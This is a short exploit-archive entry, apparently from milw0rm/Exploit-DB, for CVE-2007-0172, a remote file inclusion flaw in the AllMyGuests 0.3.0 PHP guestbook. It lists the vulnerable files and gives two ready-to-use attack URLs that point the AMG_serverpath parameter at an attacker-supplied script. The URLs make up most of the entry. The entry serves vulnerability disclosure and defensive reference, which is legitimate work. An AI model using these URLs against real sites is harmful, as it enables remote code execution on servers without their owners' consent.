AllMyGuests 0.3.0 - 'AMG_serverpath' Remote File Inclusion

Author: beks
type: webapps
platform: php
port: 
date_added: 2007-01-06 
date_updated: 2016-11-22 
verified: 1 
codes: OSVDB-35923;CVE-2007-0172;OSVDB-35921;OSVDB-35919;OSVDB-35917;OSVDB-35916;OSVDB-35915 
tags: 
aliases:  
screenshot_url:  
application_url: 

AllMyGuests 3.0 Remote File Inclusion Vulnerability

#Software: AllMyGuests

#Version: 3.0

#Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip

#Found By: beks

#Bug In:

/include/submit.inc.php
/admin/index.php
/include/cm_submit.inc.php
/comments.php
/index.php
/signin.php

#Risk: Medium

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
http://[target]/[AllMyGuests_Path]/signin.php?sent=1&AMG_serverpath=[evil_script]

# milw0rm.com [2007-01-07]